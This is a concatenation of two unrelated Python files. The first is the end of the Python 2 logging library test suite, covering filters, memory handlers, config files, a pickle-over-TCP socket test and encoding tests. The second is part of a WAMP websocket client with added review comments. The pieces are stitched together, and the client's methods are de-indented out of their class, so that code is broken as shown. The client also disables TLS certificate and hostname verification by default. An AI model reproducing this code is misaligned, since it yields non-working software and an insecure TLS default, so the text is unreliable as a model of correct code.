    expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"

    def setUp(self):
        # Register display names for every custom level so the formatted
        # output uses 'Silent', 'Boring', etc. instead of "Level 120".
        BaseTest.setUp(self)
        for k, v in my_logging_levels.items():
            logging.addLevelName(k, v)

    def log_at_all_levels(self, logger):
        # Emit one numbered message at each custom level, lowest first.
        for lvl in LEVEL_RANGE:
            logger.log(lvl, self.next_message())

    def test_logger_filter(self):
        # Filter at logger level.
        self.root_logger.setLevel(VERBOSE)
        # Levels >= 'Verbose' are good.
        self.log_at_all_levels(self.root_logger)
        self.assert_log_lines([
            ('Verbose', '5'),
            ('Sociable', '6'),
            ('Effusive', '7'),
            ('Terse', '8'),
            ('Taciturn', '9'),
            ('Silent', '10'),
        ])

    def test_handler_filter(self):
        # Filter at handler level.
        self.root_logger.handlers[0].setLevel(SOCIABLE)
        try:
            # Levels >= 'Sociable' are good.
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines([
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ])
        finally:
            # Restore the handler so later tests are unaffected.
            self.root_logger.handlers[0].setLevel(logging.NOTSET)

    def test_specific_filters(self):
        # Set a specific filter object on the handler, and then add another
        # filter object on the logger itself.
        handler = self.root_logger.handlers[0]
        specific_filter = None
        garr = GarrulousFilter()
        handler.addFilter(garr)
        try:
            self.log_at_all_levels(self.root_logger)
            first_lines = [
                # Notice how 'Garrulous' is missing
                ('Boring', '1'),
                ('Chatterbox', '2'),
                ('Talkative', '4'),
                ('Verbose', '5'),
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ]
            self.assert_log_lines(first_lines)

            specific_filter = VerySpecificFilter()
            self.root_logger.addFilter(specific_filter)
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines(first_lines + [
                # Not only 'Garrulous' is still missing, but also 'Sociable'
                # and 'Taciturn'
                ('Boring', '11'),
                ('Chatterbox', '12'),
                ('Talkative', '14'),
                ('Verbose', '15'),
                ('Effusive', '17'),
                ('Terse', '18'),
                ('Silent', '20'),
            ])
        finally:
            # Remove both filters regardless of assertion outcome.
            if specific_filter:
                self.root_logger.removeFilter(specific_filter)
            handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):

    """Tests for the MemoryHandler."""

    # Do not bother with a logger name group.
    expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"

    def setUp(self):
        # Buffer up to 10 records; flush on WARNING or above, into the
        # handler created by BaseTest.
        BaseTest.setUp(self)
        self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
                                                       self.root_hdlr)
        self.mem_logger = logging.getLogger('mem')
        self.mem_logger.propagate = 0
        self.mem_logger.addHandler(self.mem_hdlr)

    def tearDown(self):
        self.mem_hdlr.close()
        BaseTest.tearDown(self)

    def test_flush(self):
        # The memory handler flushes to its target handler based on specific
        # criteria (message count and message level).
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.info(self.next_message())
        self.assert_log_lines([])
        # This will flush because the level is >= logging.WARNING
        self.mem_logger.warn(self.next_message())
        lines = [
            ('DEBUG', '1'),
            ('INFO', '2'),
            ('WARNING', '3'),
        ]
        self.assert_log_lines(lines)
        # Two rounds of capacity-driven flushing: messages 4-13, then 14-23.
        for n in (4, 14):
            for i in range(9):
                self.mem_logger.debug(self.next_message())
            self.assert_log_lines(lines)
            # This will flush because it's the 10th message since the last
            # flush.
            self.mem_logger.debug(self.next_message())
            lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
            self.assert_log_lines(lines)
        # One more buffered message does not trigger a flush.
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
    """A special exception formatter."""

    def formatException(self, ei):
        # ei is the (type, value, traceback) triple; only the exception
        # type's name is reported.
        exc_type = ei[0]
        return "Got a [%s]" % exc_type.__name__
class ConfigFileTest(BaseTest):

    """Reading logging config from a .ini-style config file."""

    # Handler output format is "<LEVEL> ++ <message>"; no logger-name group.
    expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"

    # config0 is a standard configuration.
    config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config1 adds a little to the standard configuration.
    config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config2 has a subtle configuration error that should be reported
    # (a typo in the stream name used by the handler's args).
    config2 = config1.replace("sys.stdout", "sys.stbout")

    # config3 has a less subtle configuration error
    # (references a formatter that is never defined).
    config3 = config1.replace("formatter=form1", "formatter=misspelled_name")

    # config4 specifies a custom formatter class to be loaded
    # (ExceptionFormatter from this very module).
    config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""

    # config5 specifies a custom handler class to be loaded
    config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')

    # config6 uses ', ' delimiters in the handlers and formatters sections
    config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""

    def apply_config(self, conf):
        # Write the config text to a temp file and feed it to fileConfig.
        # NOTE(review): tempfile.mktemp is race-prone; acceptable in a test
        # but mkstemp would be safer.
        try:
            fn = tempfile.mktemp(".ini")
            f = open(fn, "w")
            f.write(textwrap.dedent(conf))
            f.close()
            logging.config.fileConfig(fn)
        finally:
            os.remove(fn)

    def test_config0_ok(self):
        # A simple config file which overrides the default settings.
        with captured_stdout() as output:
            self.apply_config(self.config0)
            logger = logging.getLogger()
            # Won't output anything
            logger.info(self.next_message())
            # Outputs a message
            logger.error(self.next_message())
            self.assert_log_lines([
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_config1_ok(self, config=config1):
        # A config file defining a sub-parser as well.
        # Also reused by test_config5_ok/test_config6_ok with other configs.
        with captured_stdout() as output:
            self.apply_config(config)
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_config2_failure(self):
        # A simple config file which overrides the default settings.
        # NOTE(review): StandardError is Python-2-only; this module targets
        # Python 2 (it also uses cPickle/cStringIO elsewhere).
        self.assertRaises(StandardError, self.apply_config, self.config2)

    def test_config3_failure(self):
        # A simple config file which overrides the default settings.
        self.assertRaises(StandardError, self.apply_config, self.config3)

    def test_config4_ok(self):
        # A config file specifying a custom formatter class.
        with captured_stdout() as output:
            self.apply_config(self.config4)
            logger = logging.getLogger()
            try:
                raise RuntimeError()
            except RuntimeError:
                logging.exception("just testing")
            sys.stdout.seek(0)
            self.assertEquals(output.getvalue(),
                "ERROR:root:just testing\nGot a [RuntimeError]\n")
            # Original logger output is empty
            self.assert_log_lines([])

    def test_config5_ok(self):
        self.test_config1_ok(config=self.config5)

    def test_config6_ok(self):
        self.test_config1_ok(config=self.config6)
class LogRecordStreamHandler(StreamRequestHandler):

    """Handler for a streaming logging request. It saves the log message in the
    TCP server's 'log_output' attribute."""

    # Sentinel message text that tells the server to stop serving.
    TCP_LOG_END = "!!!END!!!"

    def handle(self):
        """Handle multiple requests - each expected to be of 4-byte length,
        followed by the LogRecord in pickle format. Logs the record
        according to whatever policy is configured locally."""
        while True:
            chunk = self.connection.recv(4)
            if len(chunk) < 4:
                # Peer closed (or short read at EOF): stop handling.
                break
            # Big-endian 4-byte length prefix, then the pickled record.
            slen = struct.unpack(">L", chunk)[0]
            chunk = self.connection.recv(slen)
            # recv may return fewer bytes than asked; loop until complete.
            while len(chunk) < slen:
                chunk = chunk + self.connection.recv(slen - len(chunk))
            obj = self.unpickle(chunk)
            record = logging.makeLogRecord(obj)
            self.handle_log_record(record)

    def unpickle(self, data):
        # NOTE(review): cPickle is Python-2-only; also unpickling network
        # data is only safe here because both ends are this test.
        return cPickle.loads(data)

    def handle_log_record(self, record):
        # If the end-of-messages sentinel is seen, tell the server to
        # terminate.
        if self.TCP_LOG_END in record.msg:
            self.server.abort = 1
            return
        self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):

    """A simple-minded TCP socket-based logging receiver suitable for test
    purposes."""

    allow_reuse_address = 1
    # Accumulated text of every record received (appended by the handler).
    log_output = ""

    def __init__(self, host='localhost',
                 port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
                 handler=LogRecordStreamHandler):
        ThreadingTCPServer.__init__(self, (host, port), handler)
        self.abort = False
        # select() timeout so the abort flag is polled ~10x per second.
        self.timeout = 0.1
        self.finished = threading.Event()

    def serve_until_stopped(self):
        # Poll the listening socket until the handler sets self.abort.
        while not self.abort:
            rd, wr, ex = select.select([self.socket.fileno()], [], [],
                                       self.timeout)
            if rd:
                self.handle_request()
        # Notify the main thread that we're about to exit
        self.finished.set()
        # close the listen socket
        self.server_close()
class SocketHandlerTest(BaseTest):

    """Test for SocketHandler objects."""

    def setUp(self):
        """Set up a TCP server to receive log messages, and a SocketHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # port=0 lets the OS pick a free ephemeral port.
        self.tcpserver = LogRecordSocketReceiver(port=0)
        self.port = self.tcpserver.socket.getsockname()[1]
        self.threads = [
            threading.Thread(target=self.tcpserver.serve_until_stopped)]
        for thread in self.threads:
            thread.start()
        self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
        self.sock_hdlr.setFormatter(self.root_formatter)
        # Replace the captured-stream handler with the socket handler so
        # all root output goes over TCP.
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sock_hdlr)

    def tearDown(self):
        """Shutdown the TCP server."""
        try:
            self.tcpserver.abort = True
            del self.tcpserver
            self.root_logger.removeHandler(self.sock_hdlr)
            self.sock_hdlr.close()
            # Bounded join so a wedged server thread can't hang the suite.
            for thread in self.threads:
                thread.join(2.0)
        finally:
            BaseTest.tearDown(self)

    def get_output(self):
        """Get the log output as received by the TCP server."""
        # Signal the TCP receiver and wait for it to terminate.
        self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
        self.tcpserver.finished.wait(2.0)
        return self.tcpserver.log_output

    def test_output(self):
        # The log message sent to the SocketHandler is properly received.
        logger = logging.getLogger("tcp")
        logger.error("spam")
        logger.debug("eggs")
        self.assertEquals(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):

    """Test memory persistence of logger objects."""

    def setUp(self):
        """Create a dict to remember potentially destroyed objects."""
        BaseTest.setUp(self)
        self._survivors = {}

    def _watch_for_survival(self, *args):
        """Watch the given objects for survival, by creating weakrefs to
        them."""
        for obj in args:
            # Keyed by id+repr so the report stays readable even after the
            # strong reference is dropped.
            key = id(obj), repr(obj)
            self._survivors[key] = weakref.ref(obj)

    def _assert_survival(self):
        """Assert that all objects watched for survival have survived."""
        # Trigger cycle breaking.
        gc.collect()
        dead = []
        for (id_, repr_), ref in self._survivors.items():
            if ref() is None:
                dead.append(repr_)
        if dead:
            self.fail("%d objects should have survived "
                "but have been destroyed: %s" % (len(dead), ", ".join(dead)))

    def test_persistent_loggers(self):
        # Logger objects are persistent and retain their configuration, even
        # if visible references are destroyed.
        self.root_logger.setLevel(logging.INFO)
        foo = logging.getLogger("foo")
        self._watch_for_survival(foo)
        foo.setLevel(logging.DEBUG)
        self.root_logger.debug(self.next_message())
        foo.debug(self.next_message())
        self.assert_log_lines([
            ('foo', 'DEBUG', '2'),
        ])
        del foo
        # foo has survived.
        self._assert_survival()
        # foo has retained its settings.
        bar = logging.getLogger("foo")
        bar.debug(self.next_message())
        self.assert_log_lines([
            ('foo', 'DEBUG', '2'),
            ('foo', 'DEBUG', '3'),
        ])
class EncodingTest(BaseTest):

    def test_encoding_plain_file(self):
        # In Python 2.x, a plain file object is treated as having no encoding.
        log = logging.getLogger("test")
        fn = tempfile.mktemp(".log")
        # the non-ascii data we write to the log.
        data = "foo\x80"
        try:
            handler = logging.FileHandler(fn)
            log.addHandler(handler)
            try:
                # write non-ascii data to the log.
                log.warning(data)
            finally:
                log.removeHandler(handler)
                handler.close()
            # check we wrote exactly those bytes, ignoring trailing \n etc
            f = open(fn)
            try:
                self.failUnlessEqual(f.read().rstrip(), data)
            finally:
                f.close()
        finally:
            if os.path.isfile(fn):
                os.remove(fn)

    def test_encoding_cyrillic_unicode(self):
        log = logging.getLogger("test")
        # Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
        message = u'\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
        # Ensure it's written in a Cyrillic encoding
        writer_class = codecs.getwriter('cp1251')
        # NOTE(review): cStringIO is Python-2-only (consistent with the
        # rest of this module).
        stream = cStringIO.StringIO()
        writer = writer_class(stream, 'strict')
        handler = logging.StreamHandler(writer)
        log.addHandler(handler)
        try:
            log.warning(message)
        finally:
            log.removeHandler(handler)
            handler.close()
        # check we wrote exactly those bytes, ignoring trailing \n etc
        s = stream.getvalue()
        # Compare against what the data should be when encoded in CP-1251
        self.assertEqual(s, '\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):

    def test_warnings(self):
        # Route Python warnings through the logging system and verify the
        # 'py.warnings' logger receives them.
        logging.captureWarnings(True)
        warnings.filterwarnings("always", category=UserWarning)
        try:
            file = cStringIO.StringIO()
            h = logging.StreamHandler(file)
            logger = logging.getLogger("py.warnings")
            logger.addHandler(h)
            warnings.warn("I'm warning you...")
            logger.removeHandler(h)
            s = file.getvalue()
            h.close()
            self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)

            # See if an explicit file uses the original implementation
            file = cStringIO.StringIO()
            warnings.showwarning("Explicit", UserWarning, "dummy.py", 42, file,
                                 "Dummy line")
            s = file.getvalue()
            file.close()
            self.assertEqual(s, "dummy.py:42: UserWarning: Explicit\n  Dummy line\n")
        finally:
            # Restore global warning/capture state for subsequent tests.
            warnings.resetwarnings()
            logging.captureWarnings(False)
# Set the locale to the platform-dependent default.  I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
    """Run every test class in this module under the default locale."""
    run_unittest(BuiltinLevelsTest, BasicFilterTest,
                 CustomLevelsAndFiltersTest, MemoryHandlerTest,
                 ConfigFileTest, SocketHandlerTest, MemoryTest,
                 EncodingTest, WarningsTest)

if __name__ == "__main__":
    test_main()
|
__init__.py | from __future__ import unicode_literals
import re
import io
import json
import time
import threading
import six
import ssl
from six.moves import queue
import socket
import websocket
from .messages import *
from .utils import logger
from .exceptions import *
# Connection lifecycle states.
# NOTE(review): the numeric values are not monotonic with the connection
# sequence (WEBSOCKET_CONNECTED=3 and AUTHENTICATING=4 precede
# CONNECTED=2). Compare states by name only, never by ordering.
STATE_DISCONNECTED = 0
STATE_CONNECTING = 1
STATE_WEBSOCKET_CONNECTED = 3
STATE_AUTHENTICATING = 4
STATE_CONNECTED = 2

# Index constants into the [uri, callback] lists stored in
# WAMPClient._registered_calls and the [topic, callback] lists stored in
# WAMPClient._subscriptions.
REGISTERED_CALL_URI = 0
REGISTERED_CALL_CALLBACK = 1
SUBSCRIPTION_TOPIC = 0
SUBSCRIPTION_CALLBACK = 1
class WAMPConnectionError(Exception):
    """Raised when the WAMP connection is unavailable (disconnected,
    websocket closed, or a ping failed)."""
class WampInvokeWrapper(threading.Thread):
    """ Used to put invoke requests on a separate thread
        so we can make WAMP requests while in a WAMP request
    """
    def __init__(self,client,handler,message):
        # client: WAMPClient used to send the YIELD/ERROR reply.
        # handler: registered callable for this procedure.
        # message: the INVOCATION message (request_id, args, kwargs).
        super(WampInvokeWrapper,self).__init__()
        self.client = client
        self.handler = handler
        self.message = message

    def run(self):
        message = self.message
        req_id = message.request_id
        try:
            # Call the handler with the raw message plus the call's
            # positional and keyword payload.
            result = self.handler(
                        message,
                        *(message.args),
                        **(message.kwargs)
                        )
            # Reply with the handler's single return value.
            self.client.send_message(YIELD(
                request_id = req_id,
                options={},
                args=[result]
            ))
        except Exception as ex:
            error_uri = self.client.get_full_uri('error.invoke.failure')
            exargs = ["Call failed: {}".format(ex)]
            # Forward the exception's own args only when they are
            # JSON-serializable; otherwise log and send just the summary.
            try:
                json.dumps(ex.args) # Just testing
                exargs += list(ex.args)
            except TypeError as err:
                logger.warning("Unable to serialize exception arguments: {}".format(ex))
            try:
                self.client.send_message(ERROR(
                    request_code = WAMP_INVOCATION,
                    request_id = req_id,
                    details = {},
                    error = error_uri,
                    args = exargs
                ))
            # We might fail when we try to send an error message back to the
            # server (should we have disconnected)
            except Exception as ex:
                logger.error("ERROR attempting to send error message: {}".format(ex))
class WampSubscriptionWrapper(threading.Thread):
    """ Used to put invoke requests on a separate thread
        so we can make WAMP requests while in a WAMP request
    """

    def __init__(self, client, handler, event):
        # Remember the owning client, the subscription callback and the
        # EVENT message to deliver.
        super(WampSubscriptionWrapper, self).__init__()
        self.client = client
        self.handler = handler
        self.event = event

    def run(self):
        # Deliver the event on this worker thread: the callback receives
        # the raw EVENT message followed by its positional and keyword
        # payload.
        ev = self.event
        positional = ev.args
        keywords = ev.kwargs
        self.handler(ev, *positional, **keywords)
class WAMPClient(threading.Thread):
    """Threaded WAMP-over-websocket client: connects, authenticates, and
    dispatches calls, registrations, subscriptions and publishes."""

    ws = None                  # active websocket.WebSocket (None when down)
    url = None                 # ws:// or wss:// router URL
    uri_base = None            # prefix prepended to every relative URI
    realm = None               # WAMP realm to join
    agent = None               # agent string announced to the router
    authid = None              # authentication id (optional)
    authmethods = None         # list of auth methods (default: anonymous)
    timeout = None             # seconds to wait for request responses
    sslopt = None              # ssl options passed to websocket
    sockopt = None             # socket options passed to websocket
    loop_timeout = 5           # websocket read timeout / main-loop tick
    heartbeat_timeout = 10     # max seconds without a pong before reconnect
    ping_interval = 3          # seconds between websocket pings (0 disables)
    auto_reconnect = True      # falsy: fail fast; truthy: retry delay (s)

    session_id = None          # router-assigned session id after WELCOME
    peer = None                # the WELCOME message from the router

    _subscriptions = None            # subscription_id -> [topic, callback]
    _registered_calls = None         # registration_id -> [uri, callback]
    _request_loop_notify_restart = None  # Condition waking the run() loop
    _requests_pending = None         # request_id -> response queue.Queue
    _request_disconnect = None
    _request_shutdown = False        # set True to terminate run()
    _state = STATE_DISCONNECTED
    _last_ping_time = None
    _last_pong_time = None
    _heartbeat_thread = None
    _stop_heartbeat = False
def __init__(
        self,
        url='ws://localhost:8080',
        realm='realm1',
        agent='python-swampyer-1.0',
        uri_base='',
        authmethods=None,
        authid=None,
        timeout=10,
        loop_timeout=5,
        heartbeat_timeout=10,
        ping_interval=3,
        auto_reconnect=1,
        sslopt=None,
        sockopt=None,
        ):
    """Create the client thread (daemonized); no network I/O happens
    until connect()/start() is called."""
    self._state = STATE_DISCONNECTED
    super(WAMPClient,self).__init__()
    self.daemon = True

    # Used by connect() to wake the main loop after a (re)connect.
    self._request_loop_notify_restart = threading.Condition()

    # Normalize a bare True into a 1-second retry delay, since
    # auto_reconnect doubles as the sleep between attempts.
    if auto_reconnect == True:
        auto_reconnect = 1

    self.configure(
        url = url,
        uri_base = uri_base,
        realm = realm,
        agent = agent,
        timeout = timeout,
        authid = authid,
        authmethods = authmethods,
        auto_reconnect = auto_reconnect,
        sslopt = sslopt,
        sockopt = sockopt,
        loop_timeout = loop_timeout,
        heartbeat_timeout = heartbeat_timeout,
        ping_interval = ping_interval
    )
def get_full_uri(self,uri):
    """ Returns the full URI with prefix attached
    """
    # No prefix configured: the uri is already fully qualified.
    prefix = self.uri_base
    if not prefix:
        return uri
    return prefix + '.' + uri
def connect(self,soft_reset=False,**options):
    """ This just creates the websocket connection

        Moves state to CONNECTING, establishes the websocket (retrying
        forever when auto_reconnect is truthy, sleeping auto_reconnect
        seconds between attempts), resets client-side tables unless
        soft_reset is set, then marks STATE_WEBSOCKET_CONNECTED and
        wakes the run() loop.

        :param soft_reset: when True, keep existing subscriptions,
            registrations and pending requests (used by reconnect()).
        :param options: extra keyword options forwarded to the
            websocket library.
    """
    self._state = STATE_CONNECTING
    logger.debug("About to connect to {}".format(self.url))

    # FIX: the original pattern '(ws+)://([\w\.]+)(:?:(\d+))?' (a) was not
    # a raw string, (b) could not match hyphenated hostnames such as
    # "my-host.example.com", and (c) captured the port in group 4 only via
    # an accidental group layout. Use an explicit scheme alternation, a
    # host class that allows '-', and a non-capturing optional port group
    # (port is now group 3).
    m = re.search(r'(wss?)://([\w.-]+)(?::(\d+))?', self.url)

    options['subprotocols'] = ['wamp.2.json']

    # Handle the weird issue in websocket that the origin
    # port will be always http://host:port even though connection is
    # wss. This causes some origin issues with demo.crossbar.io demo
    # so we ensure we use http or https appropriately depending on the
    # ws or wss protocol
    if m and m.group(1).lower() == 'wss':
        origin_port = ':'+m.group(3) if m.group(3) else ''
        options['origin'] = 'https://{}{}'.format(m.group(2),origin_port)

    # Attempt connection once unless it's autoreconnect in which
    # case we try and try again...
    while True:
        try:
            if self.sslopt:
                options.setdefault('sslopt',self.sslopt)

            # By default if no settings are chosen we apply
            # the looser traditional policy (makes life less
            # secure but less excruciating on windows)
            if options.get("sslopt") is None:
                options["sslopt"] = {
                    "cert_reqs":ssl.CERT_NONE,
                    "check_hostname": False
                }

            if self.sockopt:
                options.setdefault('sockopt',self.sockopt)

            self.ws = websocket.WebSocket(
                          fire_cont_frame=options.pop("fire_cont_frame", False),
                          skip_utf8_validation=options.pop("skip_utf8_validation", False),
                          enable_multithread=True,
                          **options)
            self.ws.settimeout(self.loop_timeout)
            self.ws.connect(self.url, **options)
            self.handle_connect()
        except Exception as ex:
            if self.auto_reconnect:
                logger.debug(
                    "Error connecting to {url}. Reconnection attempt in {retry} second(s). {err}".format(
                        url=self.url,
                        retry=self.auto_reconnect,
                        err=ex
                    )
                )
                time.sleep(self.auto_reconnect)
                continue
            else:
                raise
        break

    logger.debug("Connected to {}".format(self.url))

    if not soft_reset:
        self._subscriptions = {}
        self._registered_calls = {}
        self._requests_pending = {}

    self._state = STATE_WEBSOCKET_CONNECTED

    # notify the threading.Conditional that restart can happen
    self._request_loop_notify_restart.acquire()
    self._request_loop_notify_restart.notify()
    self._request_loop_notify_restart.release()
def start_heartbeat(self, event):
    """Ping loop executed on the heartbeat thread.

    Every ping_interval seconds (until *event* is set or
    stop_heartbeat() is called) sends a websocket ping carrying the
    send timestamp; the pong handler elsewhere records
    _last_pong_time for liveness checks.

    :param event: threading.Event used both as the interval timer and
        the stop signal.
    :raises WAMPConnectionError: if sending a ping fails.
    """
    self._last_ping_time = None
    self._last_pong_time = None
    while not event.wait(self.ping_interval) and not self._stop_heartbeat:
        self._last_ping_time = time.time()
        try:
            self.ws.ping(str(self._last_ping_time))
        except Exception as ex:
            # FIX: the original passed ("Ping failed: %s", ex) as two
            # exception args, so the message was never %-formatted.
            raise WAMPConnectionError("Ping failed: {}".format(ex))
    self._stop_heartbeat = False
def stop_heartbeat(self):
    """Ask the heartbeat thread to exit; it notices the flag on its next
    ping_interval wakeup."""
    self._stop_heartbeat = True
def heartbeat(self):
    """ starts a new thread that sends websocket ping messages to
        the router.

        Does nothing when ping_interval is falsy (heartbeats disabled).
    """
    self._stop_heartbeat = False
    if self.ping_interval:
        event = threading.Event()
        thread = threading.Thread(
            target=self.start_heartbeat, args=(event,))
        # setDaemon() is deprecated; the daemon attribute is available
        # on every supported Python version.
        thread.daemon = True
        thread.start()
        # FIX: the class declares _heartbeat_thread but the original only
        # ever assigned self.heartbeat_thread, leaving _heartbeat_thread
        # permanently None. Set both so existing readers of either name
        # keep working.
        self._heartbeat_thread = thread
        self.heartbeat_thread = thread
def is_disconnected(self):
    """ returns a true value if the connection is currently dead
    """
    disconnected = self._state == STATE_DISCONNECTED
    return disconnected

def is_connected(self):
    """ returns a true value if the connection is currently active
    """
    connected = self._state == STATE_CONNECTED
    return connected
def configure(self, **kwargs):
    """Apply any recognized settings from kwargs onto the client."""
    # Only this fixed set of attributes may be (re)configured; anything
    # else in kwargs is silently ignored.
    allowed = (
        'url', 'uri_base', 'realm',
        'agent', 'timeout', 'authmethods', 'authid',
        'auto_reconnect', 'sslopt', 'sockopt',
        'loop_timeout', 'heartbeat_timeout', 'ping_interval',
    )
    for name in allowed:
        if name in kwargs:
            setattr(self, name, kwargs[name])
def handle_challenge(self,data):
    """ Executed when the server requests additional
        authentication

        Subclasses that support CHALLENGE-based authentication must
        override this and return the signed challenge response.

        :param data: the CHALLENGE message from the router.
        :raises NotImplementedError: always, in this base class.
    """
    # FIX: the original raised NotImplemented(...). NotImplemented is a
    # sentinel value, not an exception class, so calling it produced a
    # confusing "'NotImplementedType' object is not callable" TypeError
    # instead of the intended error.
    raise NotImplementedError(
        "Received Challenge but authentication not possible. "
        "Need to subclass 'handle_challenge'?")
def handle_connect(self):
    """ When websocket has initially connected

        Hook for subclasses; the base implementation does nothing.
    """
    pass

def handle_join(self,details):
    """Called after WELCOME: restart the heartbeat (non-anonymous
    sessions only) and replay registrations/subscriptions."""
    # Then rebind all the registrations and callbacks
    # if there's a need
    if details.details['authmethod'] != 'anonymous':
        self.heartbeat()

    # Re-register on the new session: register()/subscribe() repopulate
    # the tables with the router's freshly assigned ids.
    to_register = self._registered_calls
    self._registered_calls = {}
    for uri, callback in to_register.values():
        self.register(uri,callback)

    to_subscribe = self._subscriptions
    self._subscriptions = {}
    for uri, callback in to_subscribe.values():
        self.subscribe(uri,callback)

def handle_leave(self):
    """Hook invoked just before the session is torn down; no-op here."""
    pass

def handle_disconnect(self):
    """Hook invoked after the websocket has been closed; no-op here."""
    pass
def hello(self,details=None):
    """ Say hello to the server and wait for the welcome
        message before proceeding

        :param details: optional dict merged into the HELLO details
            (authid/agent/authmethods/roles are filled in when absent).
        :raises ExWelcomeTimeout: no WELCOME within self.timeout seconds.
        :raises ExAbort: the router answered with ABORT.
    """
    # Fresh queue: dispatch_to_awaiting()/handle_welcome() will deposit
    # the WELCOME/ABORT/GOODBYE response here.
    self._welcome_queue = queue.Queue()

    if details is None:
        details = {}
    if self.authid:
        details.setdefault('authid', self.authid)
    details.setdefault('agent', 'swampyer-1.0')
    details.setdefault('authmethods', self.authmethods or ['anonymous'])
    # Advertise all four client roles.
    details.setdefault('roles', {
        'subscriber': {},
        'publisher': {},
        'caller': {},
        'callee': {},
    })

    self._state = STATE_AUTHENTICATING
    self.send_message(HELLO(
        realm = self.realm,
        details = details
    ))

    # Wait till we get a welcome message
    try:
        message = self._welcome_queue.get(block=True,timeout=self.timeout)
    except Exception as ex:
        raise ExWelcomeTimeout("Timed out waiting for WELCOME response")
    if message == WAMP_ABORT:
        raise ExAbort("Received abort when trying to connect: {}".format(
            message.details.get('message',
            message.reason)))
    self.session_id = message.session_id
    self.peer = message

    self._state = STATE_CONNECTED

    # And hook register/subscribe to anything that's required
    self.handle_join(message)
def call(self, uri, *args, **kwargs ):
    """ Sends a RPC request to the WAMP server

        Blocks until the router replies.

        :param uri: procedure URI (uri_base prefix is applied).
        :returns: the first positional result of the RESULT message;
            for any other message type, the raw message itself.
        :raises WAMPConnectionError: not connected.
        :raises ExInvocationError: the router answered with ERROR.
    """
    if self._state == STATE_DISCONNECTED:
        raise WAMPConnectionError("WAMP is currently disconnected!")
    options = {
        'disclose_me': True
    }
    uri = self.get_full_uri(uri)
    message = self.send_and_await_response(CALL(
                  options=options,
                  procedure=uri,
                  args=args,
                  kwargs=kwargs
                ))

    if message == WAMP_RESULT:
        # NOTE(review): assumes the RESULT carries at least one positional
        # argument — an empty args list would raise IndexError here.
        return message.args[0]

    if message == WAMP_ERROR:
        if message.args:
            err = message.args
        else:
            err = [message.error]
        raise ExInvocationError(*err)

    return message
def send_message(self,message):
    """ Send awamp message to the server. We don't wait
        for a response here. Just fire out a message

        :param message: a swampyer message object (serialized via as_str).
        :raises WAMPConnectionError: client state is disconnected, the
            websocket is gone, or the socket closed mid-send.
    """
    if self._state == STATE_DISCONNECTED:
        raise WAMPConnectionError("WAMP is currently disconnected!")
    message = message.as_str()
    logger.debug("SND>: {}".format(message))
    # State may say connected while the websocket has already been torn
    # down by disconnect(); check both.
    if not self.ws:
        raise WAMPConnectionError("WAMP is currently disconnected!")
    try:
        self.ws.send(message)
    except websocket.WebSocketConnectionClosedException:
        raise WAMPConnectionError("WAMP is currently disconnected!")
def send_and_await_response(self,request):
    """ Used by most things. Sends out a request then awaits a response
        keyed by the request_id

        :param request: a message carrying a request_id.
